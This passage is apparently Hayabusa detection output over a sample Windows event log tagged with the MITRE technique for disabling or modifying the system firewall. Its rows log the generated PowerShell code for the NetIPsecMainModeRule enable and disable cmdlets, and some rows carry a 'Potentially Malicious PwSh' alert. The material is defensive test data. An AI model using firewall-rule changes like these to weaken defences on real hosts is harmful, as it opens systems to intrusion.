$__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', 
$__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletiza",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.864 +00:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"splayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', 
${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Enable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 
'Enable-NetIPsecMainModeRule' -Alias '*' function Disable-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, 
[Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and 
(@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletiza",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.864 +00:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"tion_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains 
$PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if 
($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } 
$__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Disable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Disable-NetIPsecMainModeRule' -Alias '*'",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.864 +00:00,srvdefender01.offsec.lan,4104,info,,PwSh 
Scriptblock Log,"tion_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 
'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Disable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Disable-NetIPsecMainModeRule' -Alias '*'",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 
+2021-04-23 10:09:44.865 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.865 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.867 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""New-NetIPsecMainModeRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.868 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetIPsecMainModeRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; 
